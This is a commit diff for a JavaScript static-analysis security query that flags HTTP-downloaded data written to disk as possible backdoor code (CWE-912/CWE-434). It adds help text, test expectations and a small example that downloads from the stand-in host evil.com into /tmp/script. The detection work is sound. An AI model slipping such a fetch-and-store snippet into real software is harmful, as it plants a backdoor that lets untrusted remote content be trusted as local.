JavaScript: Add query help for HttpToFileAccess query.

2025-12-17 01:03:14 +01:00 · 2018-12-05 12:58:38 +00:00
parent 3d058a2895
commit 92c1e655dd
6 changed files with 70 additions and 6 deletions
--- a/javascript/ql/src/Security/CWE-912/HttpToFileAccess.qhelp
+++ b/javascript/ql/src/Security/CWE-912/HttpToFileAccess.qhelp
@@ -0,0 +1,42 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+<overview>
+  <p>
+    Storing user-controlled data on the local file system without
+    further validation allows arbitrary file upload, and may be
+    an indication of malicious backdoor code that has been
+    implanted into an otherwise trusted code base.
+  </p>
+</overview>
+
+<recommendation>
+  <p>
+    Examine the highlighted code closely to ensure that it is
+    behaving as intended.
+  </p>
+</recommendation>
+
+<example>
+  <p>
+    The following example shows backdoor code that downloads data
+    from the URL <code>https://evil.com/script</code>, and stores
+    it in the local file <code>/tmp/script</code>.
+  </p>
+
+  <sample src="examples/HttpToFileAccess.js"/>
+
+  <p>
+    Other parts of the program might then assume that since
+    <code>/tmp/script</code> is a local file its contents can be
+    trusted, while in fact they are obtained from an untrusted
+    remote source.
+  </p>
+</example>
+
+<references>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Unrestricted_File_Upload">Unrestricted File Upload</a>.</li>
+</references>
+</qhelp>
--- a/javascript/ql/src/Security/CWE-912/HttpToFileAccess.ql
+++ b/javascript/ql/src/Security/CWE-912/HttpToFileAccess.ql
@@ -6,6 +6,7 @@
 * @id js/http-to-file-access
 * @tags security
 *       external/cwe/cwe-912
+ *       external/cwe/cwe-434
 */

 import javascript
--- a/javascript/ql/src/Security/CWE-912/examples/HttpToFileAccess.js
+++ b/javascript/ql/src/Security/CWE-912/examples/HttpToFileAccess.js
@@ -0,0 +1,8 @@
+var https = require("https");
+var fs = require("fs");
+
+https.get('https://evil.com/script', res => {
+  res.on("data", d => {
+    fs.writeFileSync("/tmp/script", d)
+  })
+});
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected
@@ -1,15 +1,19 @@
 nodes
+| HttpToFileAccess.js:5:18:5:18 | d |
+| HttpToFileAccess.js:6:37:6:37 | d |
 | tst.js:15:26:15:26 | c |
 | tst.js:16:33:16:33 | c |
 | tst.js:19:25:19:25 | c |
 | tst.js:23:27:23:26 | c |
 | tst.js:24:22:24:22 | c |
 edges
+| HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d |
 | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c |
 | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c |
 | tst.js:15:26:15:26 | c | tst.js:23:27:23:26 | c |
 | tst.js:23:27:23:26 | c | tst.js:24:22:24:22 | c |
 #select
+| HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | $@ flows to file system | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data |
 | tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data |
 | tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data |
 | tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data |
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js
+++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js
@@ -0,0 +1,8 @@
+var https = require("https");
+var fs = require("fs");
+
+https.get('https://evil.com/script', res => {
+  res.on("data", d => {
+    fs.writeFileSync("/tmp/script", d)
+  });
+});
--- a/javascript/ql/test/query-tests/Security/CWE-912/fs-writeFile-externs.js
+++ b/javascript/ql/test/query-tests/Security/CWE-912/fs-writeFile-externs.js
@@ -35,7 +35,7 @@
 * @externs
 * @fileoverview Definitions for module "fs"
 */
- var fs = {};
+var fs = {};

 /**
 * @param {string} filename
@@ -44,7 +44,8 @@
 * @return {void}
 */
 fs.writeFile = function(filename, data, callback) {};
- /**
+
+/**
 * @param {string} filename
 * @param {*} data
 * @param {{encoding: string, mode: number, flag: string}} options
@@ -52,11 +53,11 @@ fs.writeFile = function(filename, data, callback) {};
 * @return {void}
 */
 fs.writeFile = function(filename, data, options, callback) {};
- /**
+
+/**
 * @param {string} filename
 * @param {*} data
- * @param {{encoding: string, mode: string, flag: string}} options
- * @param {(function(NodeJS.ErrnoException): void)=} callback
+ * @param {{encoding: string, mode: string, flag: string}=} options
 * @return {void}
 */
-fs.writeFile = function(filename, data, options, callback) {};
+fs.writeFileSync = function(filename, data, options) {};